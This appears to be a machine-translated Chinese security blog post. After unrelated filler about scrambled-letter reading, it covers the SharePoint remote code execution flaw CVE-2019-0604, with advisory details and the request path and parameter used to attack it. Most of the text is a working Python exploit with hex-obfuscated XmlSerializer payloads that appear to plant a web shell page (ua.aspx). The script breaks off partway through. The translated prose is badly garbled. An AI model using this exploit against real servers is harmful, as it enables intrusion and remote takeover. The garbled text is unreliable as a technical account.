Research study table Ming, Chinese character sequence along not given a shadow can read loud reading, such as when you read this sentence, which is now only made in the word are full of chaos.
The results of the University of Cambridge, when the word reverse alphabetical order, you can still understand the whole meaning of the word. Where it is important: as long as the first letter of the word and the last letter of a child to the correct position. Others may be completely garbled, you can still clearly no problem reading. The reason is because the human brain during cognitive word in order not to rely on the identification letters, but on the whole.
Similarly, Chinese characters reading will analyze brain preconceived subject. If you see a sentence in the brain previously had the impression, then you can smooth it read. If not dealt with before the sentence is the brain, then of course studying pull out ~
Letters inside words out of order does not affect the reading of the phenomenon (in English applicable) scientific name is called Typoglycemia, cognitive processes used to describe the act of reading about people, there have been over half a century of research.
Recently finished college entrance examination soon, it will be seen in the group, some people say the information security needs to learn English, good at math to learn better. See Tips
Vulnerability Information
Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2019-0594, CVE-2019-0604, high risk): Microsoft SharePoint software can not check the vulnerability is triggered when an application packet source tag. An attacker could execute arbitrary code in the SharePoint application pool and the SharePoint server.
Affected:
Bugtraq ID: 106914 Class: Failure to Handle Exceptional Conditions CVE: CVE-2019-0604 Remote: Yes Local: No Published: Feb 12 2019 12:00AM Updated: Feb 12 2019 12:00AM Credit: Markus Wulftange (@mwulftange) working with Trend Micro's Zero Day Initiative Vulnerable: Microsoft SharePoint Server 2016 0 Microsoft SharePoint Server 2010 SP2 Microsoft SharePoint Foundation 2013 SP1 - Microsoft IIS 5.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server Microsoft SharePoint Enterprise Server 2016 0
Entrance attack
ItemPicker Web control is actually never used in an .aspx page. But look at its base type of usage, EntityEditorWithPicker, there should be a description /_layouts/15/Picker.aspx Picker.aspx file uses it.
This requires the use of page type selector dialog PickerDialogType provided in the form of a URL parameter. Here, any one of two types ItemPickerDialog:
· Microsoft.SharePoint.WebControls.ItemPickerDialog in Microsoft.SharePoint.dll · Microsoft.SharePoint.Portal.WebControls.ItemPickerDialog in Microsoft.SharePoint.Portal.dll With the first PickerDialogType type
PoC
When submitting ctl00 $ PlaceHolderDialogBodySection value $ ctl05 $ hiddenSpanData form of "__" is the beginning (like "_dummy"),
Breakpoints EntityInstanceIdEncoder.DecodeEntityInstanceId (string) is displayed at the following situation: while calling another ItemPickerDialog type, function call stack two differ only in the top.
This indicates ctl00 $ PlaceHolderDialogBodySection $ ctl05 $ hiddenSpanData data end up in the EntityInstanceIdEncoder.DecodeEntityInstanceId (string) in. The remaining copy requires only a configuration instance ID and the payload XmlSerializer it.
supplement:
The authors say as long as the structure of an XML serialization Payload on it, but Payload submit to where?
The original text said only half complete POST and the specific parameters are as follows:
URL: /Picker.aspx?PickerDialogType= control assembly qualified name
Parameters: ctl00 24PlaceHolderDialogBodySection%%% 24hiddenSpanData = 24ctl05 payload
In fact need to access Picker.aspx other parameters that came with the test I failed to submit the form is not included when other parameters.
I wanted to take environmental testing when this article came out vulnerability analysis, after the first day of the APP installed downloads found on the wrong ,
Plus project does not meet the program, take the environment is also a waste of time to get lazy, throw aside temporarily.
Today found last week to get a half, again study a little.
For more details, please see the original, I think the article should be a lot of people have seen it, the so-called principle of a lot of people can speak out
That are waiting for a truly usable EXP it, ha ha ha, I is the legendary hacker cloud "chicken you're so beautiful!"
Original (English): Https://Www.Thezdi.Com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
Translation (Chinese): https://www.anquanke.com/post/id/173476
EXP
#cve-2019-0604 SharePoint RCE exploit #date: 20190618 #author: k8gege import urllib import urllib2 import sys import requests url0 = sys.argv[1] url1 = '/_layouts/15/Picker.aspx?PickerDialogType=' url = url0 + url1 shellurl=url0+'/_layouts/15/ua.aspx' exp='\x63\x76\x65\x2D\x32\x30\x31\x39\x2D\x30\x36\x30\x34\x20\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x20\x52\x43\x45\x20\x65\x78\x70\x6C\x6F\x69\x74' paySpanData='\x63\x74\x6C\x30\x30\x24\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E\x24\x63\x74\x6C\x30\x35\x24\x68\x69\x64\x64\x65\x6E\x53\x70\x61\x6E\x44\x61\x74\x61'; paySection='\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E' ct1='\x63\x74\x6C\x30\x30\x24' ct2='\x24\x63\x74\x6C\x30\x35' spver = '\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2E\x57\x65\x62\x43\x6F\x6E\x74\x72\x6F\x6C\x73\x2E\x49\x74\x65\x6D\x50\x69\x63\x6B\x65\x72\x44\x69\x61\x6C\x6F\x67\x2C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2C\x56\x65\x72\x73\x69\x6F\x6E\x3D\x31\x35\x2E\x30\x2E\x30\x2E\x30\x2C\x43\x75\x6C\x74\x75\x72\x65\x3D\x6E\x65\x75\x74\x72\x61\x6C\x2C\x50\x75\x62\x6C\x69\x63\x4B\x65\x79\x54\x6F\x6B\x65\x6E\x3D\x37\x31\x65\x39\x62\x63\x65\x31\x31\x31\x65\x39\x34\x32\x39\x63' uapay='\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74' payload1='\x5F\x5F\x62\x70\x38\x32\x63\x31\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x65\x32\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x36\x30\x30\x32\x33\x30\x30\x62\x35\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x35\x37\x30\x30\x30\x37\x30\x30\x65\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x36\x34\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x37\x37\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x36\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x34\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x33\x34\x30\x30\x35\x37\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x35\x37\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x65\x36\x30\x30\x35\x36\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x34\x35\x30\x30\x66\x36\x30\x30\x62\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x33\x33\x30\x30\x31\x33\x30\x30\x32\x36\x30\x30\x36\x36\x30\x30\x33\x33\x30\x30\x38\x33\x30\x30\x35\x33\x30\x30\x36\x33\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x33\x33\x30\x30\x36\x33\x30\x30\x34\x33\x30\x30\x35\x36\x30\x30\x33\x33\x30\x30\x35\x33\x30\x30\x64\x35\x30\x30\x63\x32\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30' payload2='\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x30\x32\x30\x30\x36\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x31\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x36\x36\x30\x30\x64\x32\x30\x30\x31\x33\x30\x30\x36\x33\x30\x30\x32\x32\x30\x30\x66\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x63\x33\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x64\x32\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x32\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x61\x33\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x65\x33\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30' payload3='\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x64\x36\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x32\x36\x30\x30\x32\x32\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x36\x30\x30\x63\x36\x30\x30\x32\x37\x30\x30\x64\x32\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x65\x36\x30\x30\x66\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x33\x37\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x33\x37\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x35\x37\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x33\x34\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x62\x37\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x61\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x64\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x36\x30\x30\x64\x36\x30\x30\x34\x36\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x36\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x30\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x30\x34\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x61\x34\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x30\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x34\x37\x30\x30\x66\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x62\x33\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x64\x33\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x37\x30\x30\x35\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x65\x32\x30\x30\x35\x35\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x31\x34\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x39\x36\x30\x30\x36\x36\x30\x30\x30\x32\x30\x30\x38\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x38\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x38\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x32\x30\x30\x32\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x39\x32\x30\x30\x39\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x39\x32\x30\x30\x30\x32\x30\x30\x62\x37\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30' payload4='\x74\x6F\x6D\x3D\x3D\x3D\x52\x65\x73\x70\x6F\x6E\x73\x65\x2E\x57\x72\x69\x74\x65\x28\x22\x55\x41\x73\x68\x65\x6C\x6C\x22\x29\x3B' payload5='\x23\x64\x61\x74\x65\x3A\x20\x32\x30\x31\x39\x30\x36\x32\x36\x20\x23\x61\x75\x74\x68\x6F\x72\x3A\x20\x6B\x38\x67\x65\x67\x65' values = {'__REQUESTDIGEST':'0xF4545A48FA093FD290D386F2E317C72EF439C05EABDC8BDF0D81022DAEFE10FF6D4782A17836870BB0EBF673E71DCD6F7E631A1371319881902FDEF3032A16F4,18 Jun 2019 16:41:35 -0000', '__EVENTTARGET':'', '__EVENTARGUMENT':'', '__spPickerHasReturnValue':'', '__spPickerReturnValueHolder':'', 